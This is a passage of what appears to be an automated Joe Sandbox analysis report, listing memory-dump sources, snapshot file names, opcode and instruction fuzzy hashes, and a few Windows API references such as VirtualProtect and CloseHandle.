                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8545c621648d33f27624729c1c68c0ba9e1b2561c1dfe5a8b80762ccf815ff56
                                                                      • Instruction ID: 1fd2e146442877a9ad5761477a028aa40694b4cbec0090d8f331c8f420f00439
                                                                      • Opcode Fuzzy Hash: 8545c621648d33f27624729c1c68c0ba9e1b2561c1dfe5a8b80762ccf815ff56
                                                                      • Instruction Fuzzy Hash: 4B612A70E02645CFEB08DF7AE84179ABBE3EBC8200F14C679C005AB265EF3819159F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0ec5962903131c5c359319aa7e0c84b4bf514f2720565d10238cb2ec5ee1b859
                                                                      • Instruction ID: 49e1030d952718886eae474dbcb7eed314b56d49d9de10b24cc54fe4cecbe994
                                                                      • Opcode Fuzzy Hash: 0ec5962903131c5c359319aa7e0c84b4bf514f2720565d10238cb2ec5ee1b859
                                                                      • Instruction Fuzzy Hash: 2A515C30A00110CFEB14CB29D458BEA77A3FB85705F198175D6069B7A6CBB89EC6CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f4f10ad921561ae88ca6dba2226ee01d0ac10d3880d689aa4dc69db434e383d5
                                                                      • Instruction ID: f6d1bd190a503cc914c6978240b376b86720ab314e78248b7f6b7613a73b9e8f
                                                                      • Opcode Fuzzy Hash: f4f10ad921561ae88ca6dba2226ee01d0ac10d3880d689aa4dc69db434e383d5
                                                                      • Instruction Fuzzy Hash: 72511B70E02645CBEB08DF7AE84079ABBE3FBC8200F04C639C004AB265EF7859159F95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: deec1af1ffe6afd96472a20ce327c205e6c85ec3a6d0157f61611a7eceec02b7
                                                                      • Instruction ID: a015f31f5a16b8928f7093ae4434a85ec4f4149f914aed1cc99ba0c03bdae1ba
                                                                      • Opcode Fuzzy Hash: deec1af1ffe6afd96472a20ce327c205e6c85ec3a6d0157f61611a7eceec02b7
                                                                      • Instruction Fuzzy Hash: A3516970A14104DFEB18CF69D944BAA73E3FB84345F248074E202AB795DB789E81EB55

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 2
                                                                      • API String ID: 0-450215437
                                                                      • Opcode ID: f3f326c760c565ffdfc368f93441a91b7a91f8ee23a82c1f32461fd27cb9f893
                                                                      • Instruction ID: 75cad28f298920e4d8a3dc1b8a30732dde6aafc28d8d984b427b85ec1ba4622f
                                                                      • Opcode Fuzzy Hash: f3f326c760c565ffdfc368f93441a91b7a91f8ee23a82c1f32461fd27cb9f893
                                                                      • Instruction Fuzzy Hash: C8522A74A002198FEB15DF64D894BEDBBF2BF89300F1081AAD50AAB391DB749D85CF51

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 6957b57db1dd38bbf649d2c50c7076f5dbac53492dc205bb359b961910e850bc
                                                                      • Instruction ID: 850f6e5cd3dce179d075935ebc7f78d83fd23eaf1f7ad650e89cb946ba0a9073
                                                                      • Opcode Fuzzy Hash: 6957b57db1dd38bbf649d2c50c7076f5dbac53492dc205bb359b961910e850bc
                                                                      • Instruction Fuzzy Hash: 0D227E34A002098FEB55DF65C5947AE77F2EF88300F50846AE906AB380DF799D56CF92

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 7f66c77e08ab6362e28ed67ed76a30e27f9fa906e43836897404b3c2592a0146
                                                                      • Instruction ID: 2bdd75441988709dee176d851470e6e0d874c2105935857137bb43e4835b4f65
                                                                      • Opcode Fuzzy Hash: 7f66c77e08ab6362e28ed67ed76a30e27f9fa906e43836897404b3c2592a0146
                                                                      • Instruction Fuzzy Hash: D051AF38A04105CFDB24CF64DD48BAA77B3FB88315F204079DA02AB796DB789D81EB55

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1513584631.00000000057F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_57f0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID:
                                                                      • API String ID: 2994545307-0
                                                                      • Opcode ID: 2ca90cd07c11f50cb6e2e17894fab67b82eb4520d3af2c65e84bac1ed16dd51c
                                                                      • Instruction ID: cf1df437cbd6f2604b6aae8b9c8382276a392b10ad4d99ab072d6fe1bc16fba2
                                                                      • Opcode Fuzzy Hash: 2ca90cd07c11f50cb6e2e17894fab67b82eb4520d3af2c65e84bac1ed16dd51c
                                                                      • Instruction Fuzzy Hash: B1415738A04106CFDB24CF50DD48BAA37B3FB48315F244475DA02AB796DB789D81EB61

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: d
                                                                      • API String ID: 0-2564639436
                                                                      • Opcode ID: fa1e2d31b5185a06e0271d9eb7c4365f997ce67b6f624432dfd61962247eced3
                                                                      • Instruction ID: bb7b195eed611a8676c2a91a67cc1104551d79b51e5e19b8c3abbedeb0de746d
                                                                      • Opcode Fuzzy Hash: fa1e2d31b5185a06e0271d9eb7c4365f997ce67b6f624432dfd61962247eced3
                                                                      • Instruction Fuzzy Hash: C3D15836A006068FCB24CF68C584A6AB7F2FF88314B19CA59D45A9B755DB30FC46CF94

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 737 2ebf398-2ebf419 VirtualProtect 740 2ebf41b-2ebf421 737->740 741 2ebf422-2ebf447 737->741 740->741
                                                                      APIs
                                                                      • VirtualProtect.KERNELBASE(?,?,?,?), ref: 02EBF40C
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: ProtectVirtual
                                                                      • String ID:
                                                                      • API String ID: 544645111-0
                                                                      • Opcode ID: a5d16f500d01473e754508cd6ad7f9b075a182cb6f1de4746dc9055ecd3e6859
                                                                      • Instruction ID: f52529cce6952142c3f58ca87207407a93ea64d179f269bc05a3e2c4ea05ba15
                                                                      • Opcode Fuzzy Hash: a5d16f500d01473e754508cd6ad7f9b075a182cb6f1de4746dc9055ecd3e6859
                                                                      • Instruction Fuzzy Hash: E111E3B59002099BDB10DFAAC884BEEFBF4EF48210F14842AE519A7650C7799944CFA1

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 922 2ebf548-2ebf5b7 CloseHandle 925 2ebf5b9-2ebf5bf 922->925 926 2ebf5c0-2ebf5e5 922->926 925->926
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1505397932.0000000002EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_2eb0000_test.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle
                                                                      • String ID:
                                                                      • API String ID: 2962429428-0
                                                                      • Opcode ID: b09e2a00249b91aa531cc4f248dcf293e94dbfd87ae97f2fa2c39fb115a10784
                                                                      • Instruction ID: f5b2ea6c4a890a0ed1a0bfaea2643edcc7135d03ab5abe9c199d53984af10e59
                                                                      • Opcode Fuzzy Hash: b09e2a00249b91aa531cc4f248dcf293e94dbfd87ae97f2fa2c39fb115a10784
                                                                      • Instruction Fuzzy Hash: 74113A759003498FDB20DFAAC4457DFFBF4EF88214F24841AD519A7640C779A944CFA5
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7e6bc551a2c7bb032fb5504dafc714842b06df9880d2c5ff4f6cbf7593ec012e
                                                                      • Instruction ID: cdf685c2ab449fa6459250a630fc820a28b3f39d61fb1241dd1f5fcba805bd07
                                                                      • Opcode Fuzzy Hash: 7e6bc551a2c7bb032fb5504dafc714842b06df9880d2c5ff4f6cbf7593ec012e
                                                                      • Instruction Fuzzy Hash: 54714B34A00208CFEF55DF69C554AAEB7F6BF88300F11856AE502AB360DB76ED45CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 724da3f23f2eb620ee2586bf5a3596bbdee0df0265bdee36babcee322e6533ca
                                                                      • Instruction ID: b2b42a06c5fd40bad9afe6a7b256d2a419e5cbf1abfbb152338489be83ff7146
                                                                      • Opcode Fuzzy Hash: 724da3f23f2eb620ee2586bf5a3596bbdee0df0265bdee36babcee322e6533ca
                                                                      • Instruction Fuzzy Hash: 73616D30B05206CFEB14AF64D5487BA77ABFB84301F058A79E4068B790DBB99DC6CB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c79ce4591950329cc1889cc716cce8372d7386d0dc6ce823c78c416cdb24981a
                                                                      • Instruction ID: 20f8348170284d30ce7f314437d63f41f90634b16a67d656c07a72c9ad15866e
                                                                      • Opcode Fuzzy Hash: c79ce4591950329cc1889cc716cce8372d7386d0dc6ce823c78c416cdb24981a
                                                                      • Instruction Fuzzy Hash: 9B516831B006148FD729AF68C454A2EB7B7BFCA200BA4456CD9069B7A0DF35EC42CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: aea0ed2713eea3d08870c97cf8f9d0ebf7193cfc3191b5a164fd9026fa809882
                                                                      • Instruction ID: 522279ed7843dbb81bb8b9dcbdabddcf61ec271ca737c8f63cfb0385a96ea657
                                                                      • Opcode Fuzzy Hash: aea0ed2713eea3d08870c97cf8f9d0ebf7193cfc3191b5a164fd9026fa809882
                                                                      • Instruction Fuzzy Hash: 0B616B35B00A098FCB04EF68C458AACB7B6FF89700F108569E402977A1DB75ED86CF91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0f35c0176ba3a17e23e047539e19c6e486688fa2bd0ec81f9ed109dd4ec7e4c8
                                                                      • Instruction ID: 7594866469a608d216cd2150503211b202988229f1f6f9a2be8a1b059bdf914e
                                                                      • Opcode Fuzzy Hash: 0f35c0176ba3a17e23e047539e19c6e486688fa2bd0ec81f9ed109dd4ec7e4c8
                                                                      • Instruction Fuzzy Hash: 7951E535B10618DFCB04DF68C998AADB7B6BF88710F1481A9E5069B7A5CB31EC45CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f2bff39e84b9abe1a73fa44bcef264497dc85642a7d84adf87f2bd5071ce0b3a
                                                                      • Instruction ID: e803ee7fb19b332bb4fad1979f6f577f35ee007699ad6f5930c99328911a39bb
                                                                      • Opcode Fuzzy Hash: f2bff39e84b9abe1a73fa44bcef264497dc85642a7d84adf87f2bd5071ce0b3a
                                                                      • Instruction Fuzzy Hash: 8241A0337041596FCF018EE998509FFBBEEAF89211B14406AFA15E7241DA25CD259BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4af7e1ed5d40ad0ad0f4b6c61921102bc63958224ddb1a58445aea7243207cd0
                                                                      • Instruction ID: 38f4669db4f7a1b5520c3ac8fedf7c926f8aa5a907db3dd4c9956abbe1b05a5e
                                                                      • Opcode Fuzzy Hash: 4af7e1ed5d40ad0ad0f4b6c61921102bc63958224ddb1a58445aea7243207cd0
                                                                      • Instruction Fuzzy Hash: 57518871E002589FDF55CFAAD544BDEBBF6AF44305F14C06AE408AB280C7359846CF92
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 0fdc7da5f8ac5fde29c5adc0544fdead6b3b349d856d9823c2955f9a2ff3b8f9
                                                                      • Instruction ID: b13abdad23faef134ad95f7b52aa8ed4ca3eab0e3a87616eb1534326f6959d72
                                                                      • Opcode Fuzzy Hash: 0fdc7da5f8ac5fde29c5adc0544fdead6b3b349d856d9823c2955f9a2ff3b8f9
                                                                      • Instruction Fuzzy Hash: 26516F76600100EFDB459FA8C804EA97BB3FF8D31471580A8E2099B372DA36DC21EB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b998e24968446469e4e35a49b8aa982cf876d083cc0cbd8a9ce246f16ddb5b9c
                                                                      • Instruction ID: 1b2c299f1234268f3d24a8fadfbf8fb81060b7151893d5957353e2a336380ee6
                                                                      • Opcode Fuzzy Hash: b998e24968446469e4e35a49b8aa982cf876d083cc0cbd8a9ce246f16ddb5b9c
                                                                      • Instruction Fuzzy Hash: 54516D35B1060D9FCB089F64E4A8AAEBBB6FF88711F004169F5029B364DF749D06CB81
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ca4bbcf5b16138e667a78578f585bcda7d252a6796a4bdb8cd16d5cc894a441a
                                                                      • Instruction ID: a20240c93f24053c94d720ff2def53cad5b1b8b05d317adf5948eff007bb5aad
                                                                      • Opcode Fuzzy Hash: ca4bbcf5b16138e667a78578f585bcda7d252a6796a4bdb8cd16d5cc894a441a
                                                                      • Instruction Fuzzy Hash: 5B414B34B10110CFCB58DB79D55496DB7E2EF88755B1180AAE906DB360DB31EC06CB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f46ecd8ad9ac2975f77fbc5d8f609b1cf9bda0230dd3347d8b6f2f5fac50dcca
                                                                      • Instruction ID: f5dd96fee9772f00c41173f7c7bffb9a22a5331429ee62264e9152e22e623d91
                                                                      • Opcode Fuzzy Hash: f46ecd8ad9ac2975f77fbc5d8f609b1cf9bda0230dd3347d8b6f2f5fac50dcca
                                                                      • Instruction Fuzzy Hash: 054103712047008FE324DF26C48479A77F6EF84310F148A29D4568B7A1EBB5ED85CB95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2c7e3acea0cda0017d1d2d8ee88b98d6575a10ec26a1abfc6054e4255ddb35d5
                                                                      • Instruction ID: 1d86b3c55dd3bf859ba9c869d54bb277644fc8cf43992f2c037cdcde4c75e396
                                                                      • Opcode Fuzzy Hash: 2c7e3acea0cda0017d1d2d8ee88b98d6575a10ec26a1abfc6054e4255ddb35d5
                                                                      • Instruction Fuzzy Hash: 90414C35B106188FCB04EB68C858A6EB7B7AFC8A10F10852DD507AB3A5DF749C46CF95
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 566725e45168a3a8a9216ffdbeb3c046a6dd43228857a1d096aec11daef11ab6
                                                                      • Instruction ID: fda39e2169849cb98793b5421ffde2db5ca86394668aff0b0e300de9539976ac
                                                                      • Opcode Fuzzy Hash: 566725e45168a3a8a9216ffdbeb3c046a6dd43228857a1d096aec11daef11ab6
                                                                      • Instruction Fuzzy Hash: 3C41D374B80510CFDF49AB30E51D76E36A6FB88306B104A68E4078B7A4DF789D92CB46
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512292095.0000000005680000.00000040.00000800.00020000.00000000.sdmp, Offset: 05680000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_5680000_test.jbxd
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a45fafbde2a21f1b7a774920fbd4edc142dddbcaa32a10b227b978188ccb0ec
                                                                      • Instruction ID: f883d5b4e800149ae5472c5812adbea826cea96d192a0ec86366f33b20dba78a
                                                                      • Opcode Fuzzy Hash: 6a45fafbde2a21f1b7a774920fbd4edc142dddbcaa32a10b227b978188ccb0ec
                                                                      • Instruction Fuzzy Hash: A81100357002055BE714AAB99C51BEB6BABEB8A340F1440B9A206DB382CD64AC0187A0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c616388b54bd0b2a9bce9053e68eaba8ccbe0a171a71481426b46f4541684aac
                                                                      • Instruction ID: dc40135317bd001ff4b81954dea09f998d00f2d98f3365947c197843fcb75bda
                                                                      • Opcode Fuzzy Hash: c616388b54bd0b2a9bce9053e68eaba8ccbe0a171a71481426b46f4541684aac
                                                                      • Instruction Fuzzy Hash: AC1101317402145FE718EABA8C95BABA6EBFFC9740F144078A209DB391DDB4EC0087E4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1d0815cbb7c7d4d57b3b3a0137b191e667fba6b53bfc2b461144a97b6ca76088
                                                                      • Instruction ID: 1c97ecf990bedb9db1f44f4ba17db80ca4e10e7f40ad3dca3564bbfdb3a68737
                                                                      • Opcode Fuzzy Hash: 1d0815cbb7c7d4d57b3b3a0137b191e667fba6b53bfc2b461144a97b6ca76088
                                                                      • Instruction Fuzzy Hash: 002159353482989FCB05CE2AC894AAA7BEAFF8A210B044095F845CB360CA31DC50DB20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 89c995989cfe5b9b2b53d7ef816d4433a944291be10c349c0b060479734ef482
                                                                      • Instruction ID: 519e0f7982db24279eff22ae8d7a2499d5d4d7e1c572c10cd0a304c52be57ac4
                                                                      • Opcode Fuzzy Hash: 89c995989cfe5b9b2b53d7ef816d4433a944291be10c349c0b060479734ef482
                                                                      • Instruction Fuzzy Hash: B4210B366001049FCB09CF98E998E99BBB6FF48320F1684A9E6059B372C731ED15DB40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ccc147f2bf6c0273d452c85f81f2af34eced3c2f5336e26fdbd931d19896638d
                                                                      • Instruction ID: 701a5b223c6e1b3972784cfe233ca3a685dfa11dc3b3b3133b6075d0ad2f0a38
                                                                      • Opcode Fuzzy Hash: ccc147f2bf6c0273d452c85f81f2af34eced3c2f5336e26fdbd931d19896638d
                                                                      • Instruction Fuzzy Hash: 9E210676A002098FDB04DF98C545ADDB7F2BF88300F1001A9E405AB3A1CB75AD85CFA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512625132.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56a0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7870a973c31d7ace8d73e4feb292c44d1f22495cfb1664834f84e0dba8a4392
                                                                      • Instruction ID: 580621fa2f1a44fe69ce434b18fcc617dc168ac4c500c8c7917fb89761bfa6d1
                                                                      • Opcode Fuzzy Hash: c7870a973c31d7ace8d73e4feb292c44d1f22495cfb1664834f84e0dba8a4392
                                                                      • Instruction Fuzzy Hash: B7219D7A3482849FCB05CF2AC854AAA3BEAFF8E200B044096FC45CB361DA31DC51DF20
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 56ac7ba362f534e62fa928f7c7e9a236622e83bf264d5f3c55f85ea2f7abea15
                                                                      • Instruction ID: b8f3867c3f3ff87738a562718b40c07ba2ea8a21bbf1dc3766d46ddaebeca910
                                                                      • Opcode Fuzzy Hash: 56ac7ba362f534e62fa928f7c7e9a236622e83bf264d5f3c55f85ea2f7abea15
                                                                      • Instruction Fuzzy Hash: 98214C31E10646CFDB15CF65C44499EFBB2BFC5304B25854AE801AB360DFB0A94ACF91
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1512832339.00000000056B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056B0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_56b0000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d3a01a7c22be060dfa56b698f8ca041e590476540033b11191a58f99e1d64886
                                                                      • Instruction ID: 054d6b2a2d0f510ea3915852aa8b6f2a12c28ddd536ede43e11be23aa05e6ce5
                                                                      • Opcode Fuzzy Hash: d3a01a7c22be060dfa56b698f8ca041e590476540033b11191a58f99e1d64886
                                                                      • Instruction Fuzzy Hash: 5F213D35A002199FDB14DFA9C4589EE7FB6EB8C720F149129E815A7390DA719D81CFA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1523614912.0000000006460000.00000040.00000800.00020000.00000000.sdmp, Offset: 06460000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_6460000_test.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
